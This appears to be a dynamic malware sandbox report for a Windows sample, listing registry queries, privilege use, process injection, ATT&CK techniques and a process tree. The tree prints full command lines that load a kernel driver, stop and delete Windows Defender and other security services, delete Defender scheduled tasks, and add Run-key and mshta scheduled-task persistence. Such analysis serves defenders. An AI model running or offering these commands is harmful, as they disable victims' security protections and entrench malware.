Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost015.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	7571af87e1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	MSBuild.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	TempBXZDMB8M2P4MRBHHBWPGVLGVIAI7CLNS.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	155557f5e69e2cf0af05029b9c80d4a1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cUpXaxB.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	483d2fa8a0d53818306efeb32d3.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	extrac32.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	5ad03fa0.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	apple.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	y0u3d_003.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	831adba42a.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	svchost.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	laf6w_001.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	findstr.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	choice.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	bab10adf.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	11.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	schtasks.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	9ccc466db6.exe

Checks processor information in registry 2 TTPs 4 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	831adba42a.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	831adba42a.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	chrome.exe

Delays execution with timeout.exe 2 IoCs

defense_evasion

pid	Process
1052	timeout.exe
5928	timeout.exe

Enumerates system info in registry 2 TTPs 6 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	msedge.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	msedge.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName	chrome.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	chrome.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	msedge.exe

Modifies data under HKEY_USERS 2 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry	chrome.exe
Set value (int)	\REGISTRY\USER\S-1-5-19\SOFTWARE\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133872765011200004"	chrome.exe

Modifies registry key 1 TTPs 8 IoCs

Modify Registry

T1112

pid	Process
11544	reg.exe
11672	reg.exe
11788	reg.exe
832	reg.exe
4604	reg.exe
2272	reg.exe
6040	reg.exe
11432	reg.exe

Scheduled Task/Job: Scheduled Task 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence execution

Scheduled Task

T1053.005

pid	Process
5236	schtasks.exe
3120	schtasks.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
3880	155557f5e69e2cf0af05029b9c80d4a1.exe
3880	155557f5e69e2cf0af05029b9c80d4a1.exe
4472	rapes.exe
4472	rapes.exe
1960	cUpXaxB.exe
1960	cUpXaxB.exe
1392	powershell.exe
1392	powershell.exe
1392	powershell.exe
1660	TempBXZDMB8M2P4MRBHHBWPGVLGVIAI7CLNS.EXE
1660	TempBXZDMB8M2P4MRBHHBWPGVLGVIAI7CLNS.EXE
2628	powershell.exe
2628	powershell.exe
2628	powershell.exe
1972	powershell.exe
1972	powershell.exe
1972	powershell.exe
3656	powershell.exe
3656	powershell.exe
3656	powershell.exe
2664	powershell.exe
2664	powershell.exe
2664	powershell.exe
5088	rapes.exe
5088	rapes.exe
6136	483d2fa8a0d53818306efeb32d3.exe
6136	483d2fa8a0d53818306efeb32d3.exe
2872	MSBuild.exe
2872	MSBuild.exe
2872	MSBuild.exe
2872	MSBuild.exe
1724	powershell.exe
1724	powershell.exe
1724	powershell.exe
1900	MSBuild.exe
1900	MSBuild.exe
1900	MSBuild.exe
1900	MSBuild.exe
4720	powershell.exe
4720	powershell.exe
4720	powershell.exe
8124	cUpXaxB.exe
8124	cUpXaxB.exe
10984	Organizations.com
10984	Organizations.com
10984	Organizations.com
10984	Organizations.com
10984	Organizations.com
10984	Organizations.com
12124	831adba42a.exe
12124	831adba42a.exe
12124	831adba42a.exe
12124	831adba42a.exe
12736	MSBuild.exe
12736	MSBuild.exe
12736	MSBuild.exe
12736	MSBuild.exe
12124	831adba42a.exe
12124	831adba42a.exe
10984	Organizations.com
10984	Organizations.com
10984	Organizations.com
10984	Organizations.com
6444	svchost.exe

Suspicious behavior: LoadsDriver 7 IoCs

pid	Process
656	Process not Found
656	Process not Found
5880	tzutil.exe
7884	bab10adf.exe
7884	bab10adf.exe
7884	bab10adf.exe
7884	bab10adf.exe

Suspicious behavior: MapViewOfSection 6 IoCs

pid	Process
4916	y0u3d_003.exe
4916	y0u3d_003.exe
4916	y0u3d_003.exe
3456	laf6w_001.exe
3456	laf6w_001.exe
3456	laf6w_001.exe

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 6 IoCs

pid	Process
13152	chrome.exe
13152	chrome.exe
13152	chrome.exe
13152	chrome.exe
7800	msedge.exe
7800	msedge.exe

Suspicious use of AdjustPrivilegeToken 60 IoCs

description	pid	Process
Token: SeDebugPrivilege	1392	powershell.exe
Token: SeDebugPrivilege	2628	powershell.exe
Token: SeDebugPrivilege	1972	powershell.exe
Token: SeDebugPrivilege	3656	powershell.exe
Token: SeDebugPrivilege	2664	powershell.exe
Token: SeDebugPrivilege	1724	powershell.exe
Token: SeLoadDriverPrivilege	5880	tzutil.exe
Token: SeDebugPrivilege	4720	powershell.exe
Token: SeDebugPrivilege	9220	tasklist.exe
Token: SeDebugPrivilege	9568	tasklist.exe
Token: SeShutdownPrivilege	13152	chrome.exe
Token: SeCreatePagefilePrivilege	13152	chrome.exe
Token: SeShutdownPrivilege	13152	chrome.exe
Token: SeCreatePagefilePrivilege	13152	chrome.exe
Token: SeShutdownPrivilege	13152	chrome.exe
Token: SeCreatePagefilePrivilege	13152	chrome.exe
Token: SeShutdownPrivilege	13152	chrome.exe
Token: SeCreatePagefilePrivilege	13152	chrome.exe
Token: SeShutdownPrivilege	13152	chrome.exe
Token: SeCreatePagefilePrivilege	13152	chrome.exe
Token: SeShutdownPrivilege	13152	chrome.exe
Token: SeCreatePagefilePrivilege	13152	chrome.exe
Token: SeDebugPrivilege	7884	bab10adf.exe
Token: SeBackupPrivilege	7884	bab10adf.exe
Token: SeRestorePrivilege	7884	bab10adf.exe
Token: SeLoadDriverPrivilege	7884	bab10adf.exe
Token: SeShutdownPrivilege	7884	bab10adf.exe
Token: SeSystemEnvironmentPrivilege	7884	bab10adf.exe
Token: SeSecurityPrivilege	7884	bab10adf.exe
Token: SeBackupPrivilege	7884	bab10adf.exe
Token: SeRestorePrivilege	7884	bab10adf.exe
Token: SeDebugPrivilege	7884	bab10adf.exe
Token: SeSystemEnvironmentPrivilege	7884	bab10adf.exe
Token: SeSecurityPrivilege	7884	bab10adf.exe
Token: SeCreatePermanentPrivilege	7884	bab10adf.exe
Token: SeShutdownPrivilege	7884	bab10adf.exe
Token: SeLoadDriverPrivilege	7884	bab10adf.exe
Token: SeIncreaseQuotaPrivilege	7884	bab10adf.exe
Token: SeSecurityPrivilege	7884	bab10adf.exe
Token: SeSystemProfilePrivilege	7884	bab10adf.exe
Token: SeDebugPrivilege	7884	bab10adf.exe
Token: SeMachineAccountPrivilege	7884	bab10adf.exe
Token: SeCreateTokenPrivilege	7884	bab10adf.exe
Token: SeAssignPrimaryTokenPrivilege	7884	bab10adf.exe
Token: SeTcbPrivilege	7884	bab10adf.exe
Token: SeAuditPrivilege	7884	bab10adf.exe
Token: SeSystemEnvironmentPrivilege	7884	bab10adf.exe
Token: SeLoadDriverPrivilege	7884	bab10adf.exe
Token: SeLoadDriverPrivilege	7884	bab10adf.exe
Token: SeIncreaseQuotaPrivilege	7884	bab10adf.exe
Token: SeSecurityPrivilege	7884	bab10adf.exe
Token: SeSystemProfilePrivilege	7884	bab10adf.exe
Token: SeDebugPrivilege	7884	bab10adf.exe
Token: SeMachineAccountPrivilege	7884	bab10adf.exe
Token: SeCreateTokenPrivilege	7884	bab10adf.exe
Token: SeAssignPrimaryTokenPrivilege	7884	bab10adf.exe
Token: SeTcbPrivilege	7884	bab10adf.exe
Token: SeAuditPrivilege	7884	bab10adf.exe
Token: SeSystemEnvironmentPrivilege	7884	bab10adf.exe
Token: SeDebugPrivilege	6176	powershell.exe

Suspicious use of FindShellTrayWindow 34 IoCs

pid	Process
3880	155557f5e69e2cf0af05029b9c80d4a1.exe
936	36e7f6abff.exe
936	36e7f6abff.exe
936	36e7f6abff.exe
10984	Organizations.com
10984	Organizations.com
10984	Organizations.com
13152	chrome.exe
13152	chrome.exe
13152	chrome.exe
13152	chrome.exe
13152	chrome.exe
13152	chrome.exe
13152	chrome.exe
13152	chrome.exe
13152	chrome.exe
13152	chrome.exe
13152	chrome.exe
13152	chrome.exe
13152	chrome.exe
13152	chrome.exe
13152	chrome.exe
13152	chrome.exe
13152	chrome.exe
13152	chrome.exe
13152	chrome.exe
13152	chrome.exe
13152	chrome.exe
13152	chrome.exe
13152	chrome.exe
13152	chrome.exe
13152	chrome.exe
13152	chrome.exe
7800	msedge.exe

Suspicious use of SendNotifyMessage 6 IoCs

pid	Process
936	36e7f6abff.exe
936	36e7f6abff.exe
936	36e7f6abff.exe
10984	Organizations.com
10984	Organizations.com
10984	Organizations.com

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 3880 wrote to memory of 4472	3880	155557f5e69e2cf0af05029b9c80d4a1.exe	89
PID 3880 wrote to memory of 4472	3880	155557f5e69e2cf0af05029b9c80d4a1.exe	89
PID 3880 wrote to memory of 4472	3880	155557f5e69e2cf0af05029b9c80d4a1.exe	89
PID 4472 wrote to memory of 1960	4472	rapes.exe	100
PID 4472 wrote to memory of 1960	4472	rapes.exe	100
PID 4472 wrote to memory of 1960	4472	rapes.exe	100
PID 4472 wrote to memory of 776	4472	rapes.exe	102
PID 4472 wrote to memory of 776	4472	rapes.exe	102
PID 4472 wrote to memory of 776	4472	rapes.exe	102
PID 776 wrote to memory of 2072	776	apple.exe	103
PID 776 wrote to memory of 2072	776	apple.exe	103
PID 776 wrote to memory of 2072	776	apple.exe	103
PID 2072 wrote to memory of 5756	2072	11.exe	105
PID 2072 wrote to memory of 5756	2072	11.exe	105
PID 5756 wrote to memory of 60	5756	cmd.exe	107
PID 5756 wrote to memory of 60	5756	cmd.exe	107
PID 5756 wrote to memory of 60	5756	cmd.exe	107
PID 60 wrote to memory of 3656	60	11.exe	108
PID 60 wrote to memory of 3656	60	11.exe	108
PID 3656 wrote to memory of 3388	3656	cmd.exe	110
PID 3656 wrote to memory of 3388	3656	cmd.exe	110
PID 3656 wrote to memory of 2308	3656	cmd.exe	111
PID 3656 wrote to memory of 2308	3656	cmd.exe	111
PID 3656 wrote to memory of 1052	3656	cmd.exe	112
PID 3656 wrote to memory of 1052	3656	cmd.exe	112
PID 3656 wrote to memory of 3196	3656	cmd.exe	113
PID 3656 wrote to memory of 3196	3656	cmd.exe	113
PID 3656 wrote to memory of 3352	3656	cmd.exe	114
PID 3656 wrote to memory of 3352	3656	cmd.exe	114
PID 3656 wrote to memory of 2708	3656	cmd.exe	115
PID 3656 wrote to memory of 2708	3656	cmd.exe	115
PID 3656 wrote to memory of 412	3656	cmd.exe	116
PID 3656 wrote to memory of 412	3656	cmd.exe	116
PID 3656 wrote to memory of 436	3656	cmd.exe	117
PID 3656 wrote to memory of 436	3656	cmd.exe	117
PID 3656 wrote to memory of 5468	3656	cmd.exe	118
PID 3656 wrote to memory of 5468	3656	cmd.exe	118
PID 3656 wrote to memory of 836	3656	cmd.exe	119
PID 3656 wrote to memory of 836	3656	cmd.exe	119
PID 3656 wrote to memory of 6072	3656	cmd.exe	120
PID 3656 wrote to memory of 6072	3656	cmd.exe	120
PID 3656 wrote to memory of 5488	3656	cmd.exe	121
PID 3656 wrote to memory of 5488	3656	cmd.exe	121
PID 3656 wrote to memory of 5836	3656	cmd.exe	122
PID 3656 wrote to memory of 5836	3656	cmd.exe	122
PID 3656 wrote to memory of 5656	3656	cmd.exe	123
PID 3656 wrote to memory of 5656	3656	cmd.exe	123
PID 3656 wrote to memory of 1120	3656	cmd.exe	124
PID 3656 wrote to memory of 1120	3656	cmd.exe	124
PID 3656 wrote to memory of 5700	3656	cmd.exe	125
PID 3656 wrote to memory of 5700	3656	cmd.exe	125
PID 3656 wrote to memory of 4104	3656	cmd.exe	126
PID 3656 wrote to memory of 4104	3656	cmd.exe	126
PID 3656 wrote to memory of 5436	3656	cmd.exe	127
PID 3656 wrote to memory of 5436	3656	cmd.exe	127
PID 3656 wrote to memory of 5524	3656	cmd.exe	128
PID 3656 wrote to memory of 5524	3656	cmd.exe	128
PID 3656 wrote to memory of 5152	3656	cmd.exe	129
PID 3656 wrote to memory of 5152	3656	cmd.exe	129
PID 3656 wrote to memory of 3048	3656	cmd.exe	130
PID 3656 wrote to memory of 3048	3656	cmd.exe	130
PID 3656 wrote to memory of 1712	3656	cmd.exe	131
PID 3656 wrote to memory of 1712	3656	cmd.exe	131
PID 3656 wrote to memory of 5884	3656	cmd.exe	132

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\system32\sihost.exe
sihost.exe
1⤵
PID:2600
- C:\Windows\SysWOW64\svchost.exe
  "C:\Windows\System32\svchost.exe"
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  PID:6444

C:\Users\Admin\AppData\Local\Temp\155557f5e69e2cf0af05029b9c80d4a1.exe
"C:\Users\Admin\AppData\Local\Temp\155557f5e69e2cf0af05029b9c80d4a1.exe"
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of FindShellTrayWindow
- Suspicious use of WriteProcessMemory
PID:3880
- C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe
  "C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"
  2⤵
  - Identifies VirtualBox via ACPI registry values (likely anti-VM)
  - Downloads MZ/PE file
  - Checks BIOS information in registry
  - Checks computer location settings
  - Executes dropped EXE
  - Identifies Wine through registry keys
  - Adds Run key to start application
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:4472
- - C:\Users\Admin\AppData\Local\Temp\10313630101\cUpXaxB.exe
    "C:\Users\Admin\AppData\Local\Temp\10313630101\cUpXaxB.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    PID:1960
- - C:\Users\Admin\AppData\Local\Temp\10314650101\apple.exe
    "C:\Users\Admin\AppData\Local\Temp\10314650101\apple.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:776
  - - C:\Users\Admin\AppData\Local\Temp\11.exe
      "C:\Users\Admin\AppData\Local\Temp\11.exe"
      4⤵
      Checks computer location settings
      Executes dropped EXE
      System Location Discovery: System Language Discovery
      Suspicious use of WriteProcessMemory
      PID:2072
    - - C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\A2A8.tmp\A2A9.tmp\A2AA.bat C:\Users\Admin\AppData\Local\Temp\11.exe"
        5⤵
        Suspicious use of WriteProcessMemory
        
        PID:5756
      - C:\Users\Admin\AppData\Local\Temp\11.exe
        
        "C:\Users\Admin\AppData\Local\Temp\11.exe" go
        6⤵
        Checks computer location settings
        Executes dropped EXE
        System Location Discovery: System Language Discovery
        Suspicious use of WriteProcessMemory
        
        PID:60
        
        C:\Windows\system32\cmd.exe
        
        "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\A3D1.tmp\A3D2.tmp\A3E3.bat C:\Users\Admin\AppData\Local\Temp\11.exe go"
        7⤵
        Drops file in Program Files directory
        Suspicious use of WriteProcessMemory
        
        PID:3656
        
        C:\Windows\system32\sc.exe
        
        sc create ddrver type= kernel binPath= "C:\Users\Admin\AppData\Local\Temp\ssisd.sys"
        8⤵
        Launches sc.exe
        
        PID:3388
        
        C:\Windows\system32\sc.exe
        
        sc start ddrver
        8⤵
        Launches sc.exe
        
        PID:2308
        
        C:\Windows\system32\timeout.exe
        
        timeout /t 1
        8⤵
        Delays execution with timeout.exe
        
        PID:1052
        
        C:\Windows\system32\sc.exe
        
        sc stop ddrver
        8⤵
        Launches sc.exe
        
        PID:3196
        
        C:\Windows\system32\sc.exe
        
        sc start ddrver
        8⤵
        Launches sc.exe
        
        PID:3352
        
        C:\Windows\system32\takeown.exe
        
        takeown /f "C:\ProgramData\Microsoft\Windows Defender" /r /d y
        8⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:2708
        
        C:\Windows\system32\icacls.exe
        
        icacls "C:\ProgramData\Microsoft\Windows Defender" /grant administrators:F /t
        8⤵
        Possible privilege escalation attempt
        Modifies file permissions
        
        PID:412
        
        C:\Windows\system32\sc.exe
        
        sc stop "WinDefend"
        8⤵
        Launches sc.exe
        
        PID:436
        
        C:\Windows\system32\sc.exe
        
        sc delete "WinDefend"
        8⤵
        Launches sc.exe
        
        PID:5468
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WinDefend" /f
        8⤵
        
        PID:836
        
        C:\Windows\system32\sc.exe
        
        sc stop "MDCoreSvc"
        8⤵
        Launches sc.exe
        
        PID:6072
        
        C:\Windows\system32\sc.exe
        
        sc delete "MDCoreSvc"
        8⤵
        Launches sc.exe
        
        PID:5488
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MDCoreSvc" /f
        8⤵
        
        PID:5836
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdNisSvc"
        8⤵
        Launches sc.exe
        
        PID:5656
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdNisSvc"
        8⤵
        Launches sc.exe
        
        PID:1120
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdNisSvc" /f
        8⤵
        
        PID:5700
        
        C:\Windows\system32\sc.exe
        
        sc stop "Sense"
        8⤵
        Launches sc.exe
        
        PID:4104
        
        C:\Windows\system32\sc.exe
        
        sc delete "Sense"
        8⤵
        Launches sc.exe
        
        PID:5436
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\Sense" /f
        8⤵
        
        PID:5524
        
        C:\Windows\system32\sc.exe
        
        sc stop "wscsvc"
        8⤵
        Launches sc.exe
        
        PID:5152
        
        C:\Windows\system32\sc.exe
        
        sc delete "wscsvc"
        8⤵
        Launches sc.exe
        
        PID:3048
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\wscsvc" /f
        8⤵
        Modifies security service
        
        PID:1712
        
        C:\Windows\system32\sc.exe
        
        sc stop "SgrmBroker"
        8⤵
        Launches sc.exe
        
        PID:5884
        
        C:\Windows\system32\sc.exe
        
        sc delete "SgrmBroker"
        8⤵
        Launches sc.exe
        
        PID:3400
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SgrmBroker" /f
        8⤵
        
        PID:5576
        
        C:\Windows\system32\sc.exe
        
        sc stop "SecurityHealthService"
        8⤵
        Launches sc.exe
        
        PID:5280
        
        C:\Windows\system32\sc.exe
        
        sc delete "SecurityHealthService"
        8⤵
        Launches sc.exe
        
        PID:1748
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SecurityHealthService" /f
        8⤵
        
        PID:2704
        
        C:\Windows\system32\sc.exe
        
        sc stop "webthreatdefsvc"
        8⤵
        Launches sc.exe
        
        PID:5764
        
        C:\Windows\system32\sc.exe
        
        sc delete "webthreatdefsvc"
        8⤵
        Launches sc.exe
        
        PID:5504
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefsvc" /f
        8⤵
        
        PID:4320
        
        C:\Windows\system32\sc.exe
        
        sc stop "webthreatdefusersvc"
        8⤵
        Launches sc.exe
        
        PID:4260
        
        C:\Windows\system32\sc.exe
        
        sc delete "webthreatdefusersvc"
        8⤵
        Launches sc.exe
        
        PID:2752
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\webthreatdefusersvc" /f
        8⤵
        
        PID:1000
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdNisDrv"
        8⤵
        Launches sc.exe
        
        PID:2348
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdNisDrv"
        8⤵
        Launches sc.exe
        
        PID:5060
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdNisDrv" /f
        8⤵
        
        PID:4468
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdBoot"
        8⤵
        Launches sc.exe
        
        PID:264
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdBoot"
        8⤵
        Launches sc.exe
        
        PID:1872
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdBoot" /f
        8⤵
        
        PID:1232
        
        C:\Windows\system32\sc.exe
        
        sc stop "WdFilter"
        8⤵
        Launches sc.exe
        
        PID:5492
        
        C:\Windows\system32\sc.exe
        
        sc delete "WdFilter"
        8⤵
        Launches sc.exe
        
        PID:2932
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\WdFilter" /f
        8⤵
        
        PID:3652
        
        C:\Windows\system32\sc.exe
        
        sc stop "SgrmAgent"
        8⤵
        Launches sc.exe
        
        PID:4484
        
        C:\Windows\system32\sc.exe
        
        sc delete "SgrmAgent"
        8⤵
        Launches sc.exe
        
        PID:3456
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\SgrmAgent" /f
        8⤵
        
        PID:1072
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecWfp"
        8⤵
        Launches sc.exe
        
        PID:1900
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecWfp"
        8⤵
        Launches sc.exe
        
        PID:4256
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecWfp" /f
        8⤵
        
        PID:1956
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecFlt"
        8⤵
        Launches sc.exe
        
        PID:5412
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecFlt"
        8⤵
        Launches sc.exe
        
        PID:3100
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecFlt" /f
        8⤵
        
        PID:5364
        
        C:\Windows\system32\sc.exe
        
        sc stop "MsSecCore"
        8⤵
        Launches sc.exe
        
        PID:948
        
        C:\Windows\system32\sc.exe
        
        sc delete "MsSecCore"
        8⤵
        Launches sc.exe
        
        PID:976
        
        C:\Windows\system32\reg.exe
        
        reg delete "HKLM\System\CurrentControlset\Services\MsSecCore" /f
        8⤵
        
        PID:1172
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /f
        8⤵
        
        PID:5628
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /f
        8⤵
        
        PID:4492
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /f
        8⤵
        
        PID:4444
        
        C:\Windows\system32\schtasks.exe
        
        schtasks /Delete /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /f
        8⤵
        
        PID:3768
        
        C:\Windows\system32\sc.exe
        
        sc stop ddrver
        8⤵
        Launches sc.exe
        
        PID:3692
        
        C:\Windows\system32\sc.exe
        
        sc delete ddrver
        8⤵
        Launches sc.exe
        
        PID:3152
- - C:\Users\Admin\AppData\Local\Temp\10317340101\Jq0hGDZ.exe
    "C:\Users\Admin\AppData\Local\Temp\10317340101\Jq0hGDZ.exe"
    3⤵
    - Executes dropped EXE
    PID:2992
  - - C:\Windows\system32\reg.exe
      reg query HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /s
      4⤵
      Modifies registry key
      PID:832
  - - C:\Windows\system32\reg.exe
      reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Microsoft Windows Service 8562" /t REG_SZ /d \"C:\Users\Admin\AppData\Local\Temp\10317340101\Jq0hGDZ.exe\" /f
      4⤵
      Adds Run key to start application
      Modifies registry key
      PID:4604
  - - C:\Windows\system32\reg.exe
      reg add HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run /v "Microsoft Windows Service 8562" /t REG_BINARY /d 020000000000000000000000 /f
      4⤵
      Modifies registry key
      PID:2272
  - - C:\Windows\system32\reg.exe
      reg add HKCU\Software\Microsoft\Windows\CurrentVersion\RunNotification /v "StartupTNotiMicrosoft Windows Service 8562" /t REG_DWORD /d 1 /f
      4⤵
      Modifies registry key
      PID:6040
- - C:\Users\Admin\AppData\Local\Temp\10317930101\36e7f6abff.exe
    "C:\Users\Admin\AppData\Local\Temp\10317930101\36e7f6abff.exe"
    3⤵
    - Executes dropped EXE
    - System Location Discovery: System Language Discovery
    - Suspicious use of FindShellTrayWindow
    - Suspicious use of SendNotifyMessage
    PID:936
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c schtasks /create /tn RL0E2macb5M /tr "mshta C:\Users\Admin\AppData\Local\Temp\z8EGz104Y.hta" /sc minute /mo 25 /ru "Admin" /f
      4⤵
      System Location Discovery: System Language Discovery
      PID:4780
    - - C:\Windows\SysWOW64\schtasks.exe
        
        schtasks /create /tn RL0E2macb5M /tr "mshta C:\Users\Admin\AppData\Local\Temp\z8EGz104Y.hta" /sc minute /mo 25 /ru "Admin" /f
        5⤵
        System Location Discovery: System Language Discovery
        Scheduled Task/Job: Scheduled Task
        
        PID:5236
  - - C:\Windows\SysWOW64\mshta.exe
      mshta C:\Users\Admin\AppData\Local\Temp\z8EGz104Y.hta
      4⤵
      Checks computer location settings
      System Location Discovery: System Language Discovery
      PID:4800
